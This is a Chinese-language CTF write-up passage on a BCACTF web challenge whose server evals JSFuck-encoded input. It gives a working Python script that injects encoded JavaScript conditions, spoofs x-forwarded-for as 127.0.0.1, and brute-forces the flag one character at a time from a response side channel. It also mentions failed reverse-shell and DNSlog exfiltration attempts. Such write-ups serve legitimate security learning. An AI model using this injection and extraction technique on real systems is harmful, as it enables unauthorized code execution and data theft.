只能输入[,],(,),!,其实就是jsfuck编码,第一层eval就可以理解为jsfuck解码
这里还有一个eval,在这里的命令是可以执行的,所以可以直接res.send(flag)
当时没想到这个做法,想反弹shell或者dnslog外带的,没成功,主要对js不熟,所以就只能对flag一位一位进行爆破了,恕我代码写的很烂,爆的很慢,(用的if语句,如果对了就返回一个函数,这是typeof的结果就是function,所以就会回显Attempting…….,如果错了就不会回显这个)
import requests
def jsencode(inp):
url="http://www.hiencode.com/ctf/jsfuck_encrypt"
data={'text':inp}
headers={"Cookie": "Hm_lvt_beeb9fcd2a1fda9ad214b7e950c372fe=1717992800; Hm_lpvt_beeb9fcd2a1fda9ad214b7e950c372fe=1717992927"}
r=requests.post(url,data=data,headers=headers)
n1=r.text.find('<pre>')+5
n2=r.text.find('</pre>')
return r.text[n1:n2]
length=''
flag='bcactf{'
for i in range(100):
c=f"if(flag.length=={i}){{() => {{ return 'Hello, World!'; }};}}"
url2="http://challs.bcactf.com:32398/check"
data2=jsencode(c)
headers={"Host": "challs.bcactf.com:32398",
"Content-Length": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
"Content-Type": "text/plain;charset=UTF-8",
"Accept": "*/*",
"Origin": "http://challs.bcactf.com:32398",
"Referer": "http://challs.bcactf.com:32398/",
"x-forwarded-for": "127.0.0.1",
"Connection": "close"}
r2=requests.post(url=url2,data=data2,headers=headers)
print(r2.text)
if(r2.text.find("abuse")>0):
print(i)
length=i
break
for j in range(6,length-1):
for k in range(48,130):
i=chr(k)
c=f"if(flag[{j}]=='{i}'){{() => {{ return 'Hello, World!'; }};}}"
url2="http://challs.bcactf.com:32398/check"
data2=jsencode(c)
headers={"Host": "challs.bcactf.com:32398",
"Content-Length": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
"Content-Type": "text/plain;charset=UTF-8",
"Accept": "*/*",
"Origin": "http://challs.bcactf.com:32398",
"Referer": "http://challs.bcactf.com:32398/",
"x-forwarded-for": "127.0.0.1",
"Connection": "close"}
r2=requests.post(url=url2,data=data2,headers=headers)
print(r2.text)
if(r2.text.find("abuse")>0):
flag+=i
print(flag)
break